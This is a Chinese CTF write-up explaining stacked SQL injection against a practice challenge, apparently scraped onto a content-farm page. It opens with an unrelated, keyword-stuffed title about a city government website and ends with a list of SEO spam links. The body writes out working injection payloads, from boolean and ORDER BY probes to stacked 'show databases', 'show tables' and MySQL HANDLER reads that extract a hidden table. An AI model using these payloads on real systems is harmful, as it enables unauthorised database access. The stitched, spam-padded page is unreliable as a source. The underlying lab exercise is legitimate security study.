当前位置: 首页 > news >正文

郑州市政府网站的建设与发展整站优化和单词

郑州市政府网站的建设与发展,整站优化和单词,装饰装修公司,唐山住房和城乡建设局网站在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。 堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。 这个是攻防世界的一道CTF赛题。 采用寻常思路来寻找sql注入漏洞。 payload:1 and 11-- 利用payload: and 12…

在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。

堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。

这个是攻防世界的一道CTF赛题。

采用寻常思路来寻找sql注入漏洞。

payload:1' and 1=1--+

 

 

利用payload:' and 1=2--+

可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。

接下来就是手工注入的常见思路,利用order by来猜列。

payload:' order by 1--+

在这里我们可以猜测有两列数据。

那么接下来利用union select 进行查询

 

发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。

 

 

payload:1';show databases;--+

 

payload:' ;show tables;--+

看到一个及其奇怪的表。

 

在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。

 

payload:';handler `1919810931114514` open;handler `1919810931114514` read first;--+

在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。

附一个学习链接:【MySQL】MySQL 之 handler 的详细使用及说明 - 灰信网(软件开发博客聚合) 

 

 

 

http://www.jinmujx.cn/news/80467.html

相关文章:

  • 番禺网站开发系统百度人工服务电话
  • 如何建立公司网站建议和规则百度网站大全旧版
  • 在线借贷网站建设windows优化大师是电脑自带的吗
  • wordpress进模板seo的中文是什么
  • wordpress公共函数在哪里seo是什么岗位
  • 可以做思维导图的网站企业网址
  • 芜湖县建设局网站营销培训总结
  • 怎样查看网站是用什么cms_做的seo自动推广工具
  • 郑州网站建设特色免费个人网站注册
  • 企业网站的概念今日头条网站推广
  • pos机做网站推广本周新闻热点事件
  • 手机网站建设效果图片扫一扫在线识别照片
  • php动态网站开发背景竞价推广教程
  • 网站设计开发文档模板私域流量运营管理
  • 为什么招聘网站做不大百度推广怎么添加关键词
  • 做有网被视频网站推广app下载
  • 做网站数据分析架构怎样自己做网站
  • 烟台装修公司网站建设网站优化+山东
  • 十堰网站建设有哪些公司泰州百度seo公司
  • 网站建设哪家好知道客户引流的最快方法是什么
  • 江苏品牌网站建设网站运营及推广方案
  • 网站seo优化技能深圳网络推广收费标准
  • 哪些网站免费做职业测评网站seo优化网站
  • 鹤山市城乡住房建设部网站seo霸屏软件
  • 大型门户网站建设一般多少钱如何建立自己的网站平台
  • 网站制作报价开在线seo短视频
  • 专业俄文网站建设株洲seo优化推荐
  • 网站推广话术郴州网站建设
  • 广州网站建设公司有哪些网站优化最为重要的内容是
  • 金华职院优质校建设网站视频外链平台